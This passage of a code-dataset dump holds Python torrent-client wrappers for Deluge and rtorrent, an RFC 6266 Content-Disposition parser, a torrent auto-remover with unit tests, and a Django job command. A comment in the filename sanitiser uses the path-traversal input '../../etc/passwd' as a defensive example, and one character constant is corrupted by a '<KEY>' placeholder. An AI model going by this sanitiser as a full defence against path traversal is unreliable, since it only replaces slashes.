identifier = "deluge"
display_name = "Deluge"
keys = [
"name",
"progress",
"state",
"total_size",
"time_added",
"total_uploaded",
"tracker_host",
"upload_payload_rate",
"download_payload_rate",
"label",
]
def __init__(self, host, port, username, password, session_path=None):
self.host = host
self.port = port
self.username = username
self.password = password
self.session_path = session_path and Path(session_path)
@property
def client(self):
return DelugeRPCClient(
host=self.host,
port=self.port,
username=self.username,
password=self.password,
decode_utf8=True,
)
def _fetch_list_result(self, filter):
result = []
try:
with self.client as client:
torrents = client.core.get_torrents_status(filter, self.keys)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
for infohash, torrent_data in torrents.items():
if torrent_data["state"] in ["Seeding", "Downloading"]:
state = TorrentState.ACTIVE
elif torrent_data["state"] in ["Error"]:
state = TorrentState.ERROR
else:
state = TorrentState.STOPPED
result.append(
TorrentData(
infohash,
torrent_data["name"],
torrent_data["total_size"],
state,
torrent_data["progress"],
torrent_data["total_uploaded"],
datetime.utcfromtimestamp(torrent_data["time_added"]).astimezone(
pytz.UTC
),
torrent_data["tracker_host"],
torrent_data["upload_payload_rate"],
torrent_data["download_payload_rate"],
torrent_data.get("label", ""),
)
)
return result
def list(self):
return self._fetch_list_result({})
def list_active(self):
return self._fetch_list_result({"state": "Active"})
def start(self, infohash):
try:
with self.client as client:
client.core.resume_torrent([infohash])
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def stop(self, infohash):
try:
with self.client as client:
client.core.pause_torrent([infohash])
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def test_connection(self):
try:
with self.client as client:
return client.core.get_free_space() is not None
except (DelugeClientException, ConnectionError, OSError):
return False
def add(
self,
torrent,
destination_path,
fast_resume=False,
add_name_to_folder=True,
minimum_expected_data="none",
stopped=False,
):
current_expected_data = calculate_minimum_expected_data(
torrent, destination_path, add_name_to_folder
)
if not has_minimum_expected_data(minimum_expected_data, current_expected_data):
raise FailedToExecuteException(
f"Minimum expected data not reached, wanted {minimum_expected_data} actual {current_expected_data}"
)
destination_path = destination_path.resolve()
encoded_torrent = base64.b64encode(bencode(torrent))
infohash = hashlib.sha1(bencode(torrent[b"info"])).hexdigest()
options = {"download_location": str(destination_path), "seed_mode": fast_resume}
if stopped:
options["add_paused"] = True
if not add_name_to_folder:
files = map_existing_files(
torrent, destination_path, add_name_to_folder=False
)
mapped_files = {}
for i, (fp, f, size, exists) in enumerate(files):
mapped_files[i] = str(f)
options["mapped_files"] = mapped_files
try:
with self.client as client:
result = client.core.add_torrent_file(
"torrent.torrent", encoded_torrent, options
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
if result != infohash:
raise FailedToExecuteException()
def remove(self, infohash):
try:
with self.client as client:
client.core.remove_torrent(infohash, False)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def retrieve_torrentfile(self, infohash):
if not self.session_path:
raise FailedToExecuteException("Session path is not configured")
torrent_path = self.session_path / "state" / f"{infohash}.torrent"
if not torrent_path.is_file():
raise FailedToExecuteException("Torrent file does not exist")
return torrent_path.read_bytes()
def get_download_path(self, infohash):
# Deluge has a download place and an internal mapping relative to the files
# which makes it a bit of a guesswork to figure out the download folder.
# The algorithm we will be using is, multifile and a single shared prefix (also single folder max).
try:
with self.client as client:
torrents = client.core.get_torrents_status(
{"id": [infohash]},
["name", "download_location", "save_path", "files"],
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException(
"Failed to fetch download_location from Deluge"
)
if not torrents:
raise FailedToExecuteException("Empty result from deluge")
torrent_data = torrents[infohash]
download_location = torrent_data.get(
"download_location", torrent_data.get("save_path")
)
if not download_location:
raise FailedToExecuteException(
"Unable to retrieve a valid download_location"
)
if (
len(torrent_data["files"]) == 1
and "/" not in torrent_data["files"][0]["path"]
):
return Path(download_location)
prefixes = set(f["path"].split("/")[0] for f in torrent_data["files"])
if len(prefixes) == 1:
return Path(download_location) / list(prefixes)[0]
else:
return Path(download_location)
def get_files(self, infohash):
try:
with self.client as client:
torrents = client.core.get_torrents_status(
{"id": [infohash]},
["name", "files", "file_progress"],
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException("Failed to fetch files from Deluge")
torrent_data = torrents[infohash]
files = torrent_data["files"]
file_progress = torrent_data["file_progress"]
is_singlefile = len(files) == 1 and "/" not in files[0]["path"]
result = []
for f, p in zip(files, file_progress):
name = f["path"]
if not is_singlefile:
name = name.split("/", 1)[1]
result.append(TorrentFile(name, f["size"], p * 100))
return result
def serialize_configuration(self):
url = f"{self.identifier}://{self.username}:{self.password}@{self.host}:{self.port}"
query = {}
if self.session_path:
query["session_path"] = str(self.session_path)
if query:
url += f"?{urlencode(query)}"
return url
@classmethod
def auto_configure(cls):
client = LocalDelugeRPCClient()
return cls(client.host, client.port, client.username, client.password)
```
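`DelugeClient` wraps the `deluge-client` RPC interface behind the shared `BaseClient` surface. A minimal connection sketch; host, port, credentials and the session path are placeholders, and `session_path` is only required for `retrieve_torrentfile()`:

```python
# Hypothetical daemon credentials and paths.
client = DelugeClient(
    host="127.0.0.1",
    port=58846,
    username="localclient",
    password="secret",
    session_path="/home/user/.config/deluge",
)
if client.test_connection():
    for torrent in client.list_active():
        print(torrent)
```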
#### File: libtc/clients/rtorrent.py
```python
import logging
import re
from datetime import datetime
from pathlib import Path
from urllib.parse import urlencode, urlsplit
from xml.parsers.expat import ExpatError
from xmlrpc.client import Error as XMLRPCError
from xmlrpc.client import ServerProxy
import pytz
from ..baseclient import BaseClient
from ..bencode import bencode
from ..exceptions import FailedToExecuteException
from ..scgitransport import SCGITransport
from ..torrent import TorrentData, TorrentFile, TorrentState
from ..utils import (
calculate_minimum_expected_data,
get_tracker_domain,
has_minimum_expected_data,
map_existing_files,
)
logger = logging.getLogger(__name__)
def create_proxy(url):
parsed = urlsplit(url)
proto = url.split(":")[0].lower()
if proto == "scgi":
if parsed.netloc:
url = f"http://{parsed.netloc}"
logger.debug(f"Creating SCGI XMLRPC Proxy with url {url}")
return ServerProxy(url, transport=SCGITransport())
else:
path = parsed.path
logger.debug(f"Creating SCGI XMLRPC Socket Proxy with socket file {path}")
return ServerProxy("http://1", transport=SCGITransport(socket_path=path))
else:
logger.debug(f"Creating Normal XMLRPC Proxy with url {url}")
return ServerProxy(url)
def bitfield_to_string(bitfield):
"""
Converts a list of booleans into a bitfield
"""
retval = bytearray((len(bitfield) + 7) // 8)
for piece, bit in enumerate(bitfield):
if bit:
retval[piece // 8] |= 1 << (7 - piece % 8)
return bytes(retval)
class RTorrentClient(BaseClient):
identifier = "rtorrent"
display_name = "rtorrent"
_methods = None
def __init__(self, url, session_path=None, torrent_temp_path=None):
self.url = url
self.proxy = create_proxy(url)
self.session_path = session_path and Path(session_path)
self.torrent_temp_path = torrent_temp_path and Path(torrent_temp_path)
def _fetch_list_result(self, view):
result = []
try:
torrents = self.proxy.d.multicall2(
"",
view,
"d.hash=",
"d.name=",
"d.is_active=",
"d.message=",
"d.size_bytes=",
"d.completed_bytes=",
"d.up.total=",
"d.up.rate=",
"d.down.rate=",
"d.timestamp.finished=",
"t.multicall=,t.url=",
"d.custom1=",
)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
for torrent in torrents:
if torrent[3]:
state = TorrentState.ERROR
elif torrent[2] == 0:
state = TorrentState.STOPPED
else:
state = TorrentState.ACTIVE
progress = (torrent[5] / torrent[4]) * 100
if torrent[10]:
tracker = get_tracker_domain(torrent[10][0][0])
else:
tracker = "None"
result.append(
TorrentData(
torrent[0].lower(),
torrent[1],
torrent[4],
state,
progress,
torrent[6],
datetime.utcfromtimestamp(torrent[9]).astimezone(pytz.UTC),
tracker,
torrent[7],
torrent[8],
torrent[11],
)
)
return result
def get_methods(self):
if self._methods is None:
self._methods = self.proxy.system.listMethods()
return self._methods
def list(self):
return self._fetch_list_result("main")
def list_active(self):
try:
if "spreadsheet_active" not in self.proxy.view.list():
self.proxy.view.add("", "spreadsheet_active")
self.proxy.view.filter(
"", "spreadsheet_active", "or={d.up.rate=,d.down.rate=}"
)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
return self._fetch_list_result("spreadsheet_active")
def start(self, infohash):
try:
self.proxy.d.start(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def stop(self, infohash):
try:
self.proxy.d.stop(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def test_connection(self):
try:
return self.proxy.system.pid() is not None
except (XMLRPCError, ConnectionError, OSError, ExpatError):
return False
def add(
self,
torrent,
destination_path,
fast_resume=False,
add_name_to_folder=True,
minimum_expected_data="none",
stopped=False,
):
current_expected_data = calculate_minimum_expected_data(
torrent, destination_path, add_name_to_folder
)
if not has_minimum_expected_data(minimum_expected_data, current_expected_data):
raise FailedToExecuteException(
f"Minimum expected data not reached, wanted {minimum_expected_data} actual {current_expected_data}"
)
destination_path = destination_path.resolve()
if fast_resume:
logger.info("Adding fast resume data")
psize = torrent[b"info"][b"piece length"]
pieces = len(torrent[b"info"][b"pieces"]) // 20
bitfield = [True] * pieces
torrent[b"libtorrent_resume"] = {b"files": []}
files = map_existing_files(torrent, destination_path)
current_position = 0
for fp, f, size, exists in files:
logger.debug(f"Handling file {fp!r}")
result = {b"priority": 1, b"completed": int(exists)}
if exists:
result[b"mtime"] = int(fp.stat().st_mtime)
torrent[b"libtorrent_resume"][b"files"].append(result)
last_position = current_position + size
first_piece = current_position // psize
last_piece = (last_position + psize - 1) // psize
for piece in range(first_piece, last_piece):
logger.debug(f"Setting piece {piece} to {exists}")
bitfield[piece] *= exists
current_position = last_position
if all(bitfield):
logger.info("This torrent is complete, setting bitfield to chunk count")
torrent[b"libtorrent_resume"][
b"bitfield"
] = pieces # rtorrent wants the number of pieces when torrent is complete
else:
logger.info("This torrent is incomplete, setting bitfield")
torrent[b"libtorrent_resume"][b"bitfield"] = bitfield_to_string(
bitfield
)
encoded_torrent = bencode(torrent)
cmd = [encoded_torrent]
if add_name_to_folder:
cmd.append(f'd.directory.set="{destination_path!s}"')
else:
cmd.append(f'd.directory_base.set="{destination_path!s}"')
logger.info(f"Sending to rtorrent: {cmd!r}")
try: # TODO: use torrent_temp_path if payload is too big
if stopped:
self.proxy.load.raw("", *cmd)
else:
self.proxy.load.raw_start("", *cmd)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def remove(self, infohash):
try:
self.proxy.d.erase(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def retrieve_torrentfile(self, infohash):
if not self.session_path:
raise FailedToExecuteException("Session path is not configured")
torrent_path = self.session_path / f"{infohash.upper()}.torrent"
if not torrent_path.is_file():
raise FailedToExecuteException("Torrent file does not exist")
return torrent_path.read_bytes()
def get_download_path(self, infohash):
try:
return Path(self.proxy.d.directory(infohash))
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException("Failed to retrieve download path")
def get_files(self, infohash):
result = []
try:
files = self.proxy.f.multicall(
infohash,
"",
"f.path=",
"f.size_bytes=",
"f.completed_chunks=",
"f.size_chunks=",
)
for f in files:
path, size, completed_chunks, size_chunks = f
if completed_chunks > size_chunks:
completed_chunks = size_chunks
if size_chunks == 0:
progress = 0.0
else:
progress = (completed_chunks / size_chunks) * 100
result.append(TorrentFile(path, size, progress))
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException("Failed to retrieve files")
return result
def serialize_configuration(self):
url = f"{self.identifier}+{self.url}"
query = {}
if self.session_path:
query["session_path"] = str(self.session_path)
if query:
url += f"?{urlencode(query)}"
return url
@classmethod
def auto_configure(cls, path="~/.rtorrent.rc"):
# Does not work with latest rtorrent config
config_path = Path(path).expanduser()
if not config_path.is_file():
raise FailedToExecuteException("Unable to find config file")
try:
config_data = config_path.read_text()
except PermissionError:
raise FailedToExecuteException("Config file not accessible")
scgi_info = re.findall(
r"^\s*scgi_(port|local)\s*=\s*(.+)\s*$", str(config_data), re.MULTILINE
)
if not scgi_info:
raise FailedToExecuteException("No scgi info found in configuration file")
scgi_method, scgi_url = scgi_info[0]
if scgi_method == "port":
scgi_url = scgi_url.strip()
else:
scgi_url = Path(scgi_url.strip()).expanduser().resolve()
client = cls(f"scgi://{scgi_url}")
session_path = Path(client.proxy.session.path()).resolve()
if session_path.is_dir():
client.session_path = session_path
return client
``` |
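Two details worth illustrating from the rtorrent client: SCGI URLs with a path component talk to a unix socket, and the fast-resume path uses `bitfield_to_string` to pack per-piece completion flags MSB-first. The socket path below is a placeholder:

```python
# Hypothetical socket path; scgi://host:port would use TCP instead.
client = RTorrentClient("scgi:///home/user/.rtorrent/rpc.socket")

# bitfield_to_string packs piece flags MSB-first:
# 10 pieces, all complete except the last -> 0xFF, then only the MSB (piece 8) set.
bits = [True] * 9 + [False]
assert bitfield_to_string(bits) == bytes([0xFF, 0x80])
```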
{
"source": "JohnDoee/pyrfc6266",
"score": 2
} |
#### File: JohnDoee/pyrfc6266/pyrfc6266.py
```python
import re
import typing
import uuid
from dataclasses import dataclass
from typing import List, Tuple, Union
from urllib.parse import unquote, urlparse
from pyparsing import (
CaselessLiteral,
Combine,
Empty,
Literal,
OneOrMore,
Optional,
ParseException,
QuotedString,
Regex,
Word,
ZeroOrMore,
alphas,
)
__all__ = [
"parse",
"parse_filename",
"secure_filename",
"requests_response_to_filename",
"ContentDisposition",
]
@dataclass
class ContentDisposition:
name: str
value: str
token_chars = (
"!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`<KEY>|~"
)
token_chars_without_wildcard = (
"!#$%&'+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`abcdefghijklmnopqrstuvwxyz|~"
)
token = Word(token_chars)
unencoded_token = Regex(
r"[%s]*[%s]" % (re.escape(token_chars), re.escape(token_chars_without_wildcard))
)
value = token | QuotedString(
quote_char='"', esc_quote='\\"', esc_char="\\", convert_whitespace_escapes=False
) # TODO: make sure it does not parse invalid <any OCTET except CTLs, but including LWS>
ext_value = Combine(
(
CaselessLiteral("UTF-8") | CaselessLiteral("ISO-8859-1") | Empty()
).set_results_name("encoding")
+ Literal("'")
+ Optional(Word(alphas + " ", min=1, max=3)).set_results_name("language")
+ Literal("'")
+ OneOrMore(
Word(
"!#$&+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`abcdefghijklmnopqrstuvwxyz|~"
)
| (Literal("%") + Word("abcdefABCDEF0123456789", exact=2))
).set_results_name("value")
)
disp_ext_parm = (
(unencoded_token + Literal("=")).set_results_name("parm*")
+ value.set_results_name("value*")
) | (
(Combine(unencoded_token + Literal("*")) + Literal("=")).set_results_name("parm*")
+ value.set_results_name("value*")
)
# filename_parm = (Combine(Literal("filename").set_results_name("parm*") + Literal('=')) + value) | (Literal("filename*=") + ext_value)
disp_ext_type = token
# disposition_parm = filename_parm | disp_ext_parm
disposition_parm = disp_ext_parm
disposition_type = (
CaselessLiteral("inline") | CaselessLiteral("attachment") | disp_ext_type
)
parser = disposition_type.set_results_name("type") + ZeroOrMore(
Literal(";") + disposition_parm
) + Optional(";")
INVALID_ISO8859_1_CHARACTERS = set(
bytes(list(range(0, 32)) + list(range(127, 160))).decode("iso-8859-1")
)
def parse(header: str) -> Tuple[str, List[ContentDisposition]]:
"""Parse a Content-Disposition header into its components.
Args:
header: The actual header value as string
Returns:
A tuple consisting of content disposition type and a list
of found dispositions.
"""
parse_result = parser.parse_string(header, parse_all=True)
content_disposition_type = parse_result["type"].lower()
all_content_disposition = []
seen_parms = set()
for parm, value in zip(parse_result.get("parm", []), parse_result.get("value", [])):
parm = "".join(parm)
if parm in seen_parms:
raise ParseException(f"Multiple parms with same name found: {parm}")
seen_parms.add(parm)
parm = parm[:-1].lower()
if parm.endswith("*"):
parse_result_value = ext_value.parse_string(value, parse_all=True)
if "encoding" not in parse_result_value:
continue
encoding = parse_result_value["encoding"].lower()
try:
value = unquote(
"".join(parse_result_value["value"]),
encoding=encoding,
errors="strict",
)
except UnicodeDecodeError:
raise ParseException("Invalid encoding found")
if encoding == "iso-8859-1":
if (
set(value) & INVALID_ISO8859_1_CHARACTERS
): # Python should really do this by itself
raise ParseException("Invalid encoding found")
all_content_disposition.append(ContentDisposition(parm, value))
return content_disposition_type, all_content_disposition
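# Minimal usage sketch (header value is illustrative):
#   parse('attachment; filename="report.pdf"')
#   -> ("attachment", [ContentDisposition(name="filename", value="report.pdf")])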
def secure_filename(filename: str) -> str:
"""Rudimentary security for filenames.
Args:
filename: A potentially insecure filename.
Returns:
A likely secure filename.
"""
return filename.replace("\\", "_").replace("/", "_")
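# E.g. secure_filename("../../etc/passwd") -> ".._.._etc_passwd" (illustrative input).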
def parse_filename(header: str, enforce_content_disposition_type: bool = False) -> typing.Optional[str]:
"""Returns a safe filename from a content-disposition header
Args:
header: The actual header value as string
enforce_content_disposition_type: Enforce content-disposition type to one of the two known types.
Returns:
None if no filename could be found
str if a filename could be found
"""
content_disposition_type, all_content_disposition = parse(header)
allowed_content_dispositions = ["attachment", "inline"]
if (
enforce_content_disposition_type
and content_disposition_type not in allowed_content_dispositions
):
return None
def normal_filename(content_disposition):
return content_disposition.value
def combine_filename(content_disposition):
filename = content_disposition.value
for i in range(1, 99999):
found_value = False
for name in [f"filename*{i}*", f"filename*{i}"]:
for content_disposition in all_content_disposition:
if content_disposition.name == name:
filename += content_disposition.value
found_value = True
break
if found_value:
break
else:
break
return filename
header_handlers = [
("filename*", normal_filename),
("filename", normal_filename),
("filename*0*", combine_filename),
("filename*0", combine_filename),
]
filename = None
for name, handler_func in header_handlers:
for content_disposition in all_content_disposition:
if content_disposition.name == name:
filename = handler_func(content_disposition)
if filename:
break
if filename:
break
if filename:
filename = secure_filename(filename)
return filename
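# Usage sketch (header values are illustrative; the second is the RFC 6266 example header):
#   parse_filename('attachment; filename="report.pdf"')              -> "report.pdf"
#   parse_filename("attachment; filename*=UTF-8''%e2%82%ac%20rates") -> "€ rates"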
def requests_response_to_filename(
response, enforce_content_disposition_type: bool = False
) -> str:
"""Turn a requests response into a filename
Args:
response: `requests.Response`
enforce_content_disposition_type: Enforce content-disposition type to one of the two known types.
Returns:
a filename as a string.
"""
content_disposition = response.headers.get("Content-Disposition")
filename = None
if content_disposition:
filename = parse_filename(
content_disposition,
enforce_content_disposition_type=enforce_content_disposition_type,
)
if not filename:
url = urlparse(response.url)
url_path = url.path.lstrip("/")
if url_path:
url_path = url_path.split("/")[-1]
if url_path:
filename = secure_filename(url_path)
if not filename:
filename = f"unknown-{uuid.uuid4()}"
return filename
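# Usage sketch (assumes the requests package is installed; URL is illustrative):
#   import requests
#   response = requests.get("https://example.com/files/archive.zip")
#   filename = requests_response_to_filename(response)
#   # falls back to the last URL path segment ("archive.zip") when no usable
#   # Content-Disposition header is present, and to an "unknown-<uuid>" name otherwise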
```
#### File: JohnDoee/pyrfc6266/setup.py
```python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="pyrfc6266",
version="1.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="RFC6266 implementation in Python",
license="MIT",
url="https://github.com/JohnDoee/pyrfc6266",
py_modules=["pyrfc6266"],
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=[
"pyparsing~=3.0.7",
],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
],
)
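# Assuming the package is published under the name= value above, it would typically be
# installed with: pip install pyrfc6266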
``` |
{
"source": "JohnDoee/rtorrent-automover",
"score": 2
} |
#### File: rtorrent-automover/automover/remover.py
```python
import logging
from datetime import timedelta, datetime
logger = logging.getLogger(__name__)
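# Expected argument shapes (inferred from automover/test/test_remover.py; values are illustrative):
#   remover_sites: {"mysite": ("ratio", "mytracker.com", 1.5), "othersite": ("time", "mytracker.com", "24")}
#   target_paths:  ["/path/to/seeding/dir"]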
def handle_remove(client, remover_sites, target_paths, test_mode=False):
for torrent in client.list():
if not torrent.is_complete:
            logger.debug('%s is not complete, skipping' % torrent)
continue
if target_paths:
for target_path in target_paths:
if torrent.path.startswith(target_path):
break
else:
logger.debug('%s is not in any known path, skipping' % torrent)
continue
else:
            logger.debug('No known target paths found, seems like we are in removal-only mode')
deleted = False
for tracker in torrent.trackers():
            for site, (t, url, limit) in remover_sites.items():
if url in tracker.lower():
if t == 'ratio':
if limit <= torrent.ratio:
                            logger.debug('Torrent %s was seeded to ratio %s and only %s is required, removing' % (torrent, torrent.ratio, limit))
if not test_mode:
torrent.delete()
deleted = True
break
elif t == 'time':
if datetime.now()-timedelta(hours=int(limit)) > torrent.finish_time:
                            logger.debug('Torrent %s was finished at %s, removing' % (torrent, torrent.finish_time))
if not test_mode:
torrent.delete()
deleted = True
break
if deleted:
break
```
#### File: automover/test/test_remover.py
```python
import unittest
from datetime import datetime, timedelta
from automover.test.helpers import *
from automover.remover import handle_remove
class TestRemover(unittest.TestCase):
def setUp(self):
self.client = client = DummyClient()
self.torrents = [
DummyTorrent(client, '1', datetime.now(), 0, '/matchpath/', False, True, ['http://matchtracker.com']),
DummyTorrent(client, '2', datetime.now(), 2, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '3', datetime.now()-timedelta(hours=20), 0.5, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '4', datetime.now()-timedelta(hours=50), 50, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '5', datetime.now()-timedelta(hours=50), 50, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '6', datetime.now(), 50, '/matchpath/', False, True, ['http://matchtracker.com']),
DummyTorrent(client, '7', datetime.now(), 50, '/matchpath/', True, True, ['http://matchNOTtracker.com']),
DummyTorrent(client, '8', datetime.now(), 50, '/matchNOTpath/', True, True, ['http://matchtracker.com']),
]
self.client.torrents = self.torrents
def test_timed_remove(self):
handle_remove(self.client, {'fakesite1': ('time', 'matchtracker', '3')}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '2', '6', '7', '8'], 'Did not remove correct torrents')
def test_ratio_remove(self):
handle_remove(self.client, {'fakesite1': ('ratio', 'matchtracker', 1.5)}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '3', '6', '7', '8'], 'Did not remove correct torrents')
def test_combined_remove(self):
handle_remove(self.client, {'fakesite1': ('ratio', 'matchtracker', 1.5), 'fakesite2': ('time', 'matchtracker', '3')}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '6', '7', '8'], 'Did not remove correct torrents')
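# These tests can be run with the standard unittest runner, e.g.:
#   python -m unittest automover.test.test_remover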
``` |
{
"source": "JohnDoee/spreadsheetui",
"score": 2
} |
#### File: management/commands/execute_jobs.py
```python
import time
from django.core.management.base import BaseCommand
from spreadsheetui.tasks import execute_jobs
class Command(BaseCommand):
help = "Execute all available jobs"
def add_arguments(self, parser):
parser.add_argument("--loop", dest="loop", action="store_true")
def handle(self, *args, **options):
if options["loop"]:
while True:
self.stdout.write(self.style.SUCCESS("Executing jobs"))
execute_jobs()
time.sleep(5)
else:
execute_jobs()
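# Invoked like any Django management command, e.g.:
#   python manage.py execute_jobs          # run pending jobs once
#   python manage.py execute_jobs --loop   # keep polling every 5 seconds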
``` |